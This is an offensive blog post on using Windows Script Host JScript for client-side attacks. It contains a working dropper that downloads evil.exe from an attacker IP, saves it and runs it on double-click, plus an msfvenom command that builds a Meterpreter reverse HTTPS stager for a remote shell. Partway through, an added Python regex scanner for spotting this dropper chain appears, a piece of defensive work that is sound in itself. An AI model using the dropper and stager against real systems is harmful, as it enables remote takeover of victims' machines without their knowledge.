Weaponising JScript

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.


When exploiting operating systems and conducting client-side attacks, it is very important to learn to "live off the land". This term refers to utilising software already installed on the target machine and understanding how that software operates by default.


In this example, we will be covering JScript, a derivative of JavaScript developed by Microsoft that is used in Internet Explorer. It can also be run outside the browser through Windows Script Host (WSH).


When executed outside of a web browser, JScript is not subject to any of the security restrictions enforced by a browser sandbox. This means we can use it as a client-side code execution vector without exploiting any vulnerabilities.


This is very useful, as by default PowerShell scripts are opened by Notepad, meaning that if you were to open or click on one by mistake it would open in Notepad and only show the text.


Dropper Example


After saving the code below as a .js file, all the victim has to do is double-click it and the attacker will get a shell from the victim's machine back to the Metasploit multi/handler listener.


// Location of the stager to fetch (see Payload Example below).
var url = "http://192.168.49.60/evil.exe";

// Fetch the file with a synchronous HTTP GET via the MSXML2 COM object.
var request = WScript.CreateObject('MSXML2.XMLHTTP');

request.Open('GET', url, false);
request.Send();

if (request.Status == 200)
{
    // Buffer the response as binary (Type = 1) and write it to disk.
    var Stream = WScript.CreateObject('ADODB.Stream');

    Stream.Open();
    Stream.Type = 1;
    Stream.Write(request.ResponseBody);
    Stream.Position = 0;

    // 2 = adSaveCreateOverWrite: overwrite the file if it already exists.
    Stream.SaveToFile("evil.exe", 2);
    Stream.Close();
}

// Launch the dropped executable from the current working directory.
var r = new ActiveXObject("WScript.Shell").Run("evil.exe");
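From the defender's side, the dropper above has a recognisable shape: an HTTP fetch through MSXML2.XMLHTTP, a binary write through ADODB.Stream.SaveToFile, and a launch through WScript.Shell.Run. The following added example (not code from the original post) scans the text of a .js file for that full chain and pulls out the URL and dropped file name for triage; the two sample scripts embedded in it are constructed for the demonstration.

```python
import re

# Constructed sample that mirrors the dropper chain shown above (not the page's code).
DROPPER_SAMPLE = r"""
var url = "http://dropper.example/evil.exe";
var req = WScript.CreateObject('MSXML2.XMLHTTP');
req.Open('GET', url, false);
req.Send();
var s = WScript.CreateObject('ADODB.Stream');
s.Open(); s.Type = 1; s.Write(req.ResponseBody); s.Position = 0;
s.SaveToFile("evil.exe", 2); s.Close();
new ActiveXObject("WScript.Shell").Run("evil.exe");
"""

# Constructed benign WSH script for comparison: reads a file and echoes it.
BENIGN_SAMPLE = r"""
var fso = WScript.CreateObject("Scripting.FileSystemObject");
WScript.Echo(fso.OpenTextFile("config.txt", 1).ReadAll());
"""

# One regex per stage of the chain: fetch, buffer to disk, execute.
STAGES = {
    "download": re.compile(r"MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "write":    re.compile(r"ADODB\.Stream", re.I),
    "save":     re.compile(r"\.SaveToFile\s*\(", re.I),
    "execute":  re.compile(r"WScript\.Shell.{0,80}?\.(Run|Exec)\s*\(", re.I | re.S),
}
URL_RX  = re.compile(r"https?://[^\s\"']+", re.I)
SAVE_RX = re.compile(r"\.SaveToFile\s*\(\s*[\"']([^\"']+)[\"']", re.I)

def scan_script(text):
    """Return the set of dropper stages present in a WSH script body."""
    return {name for name, rx in STAGES.items() if rx.search(text)}

def is_dropper(text):
    """Flag a script only when every stage of the chain is present."""
    return scan_script(text) == set(STAGES)

def extract_indicators(text):
    """Pull the URLs fetched and file names written, for triage and blocking."""
    return {"urls": URL_RX.findall(text), "dropped": SAVE_RX.findall(text)}

if __name__ == "__main__":
    for name, body in (("dropper", DROPPER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, sorted(scan_script(body)), is_dropper(body))
    print(extract_indicators(DROPPER_SAMPLE))
```

The check works on literal strings, so split or encoded object names will evade it; treat it as a mail-gateway or triage filter and pair it with runtime script telemetry on the endpoint.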

Payload Example


The payload used in the example is a .exe created with msfvenom: the Meterpreter reverse HTTPS stager on port 443. Please note this file will need to be placed on your web server at the location referenced by the URL in the dropper.


msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 -f exe -o evil.exe



Video Example





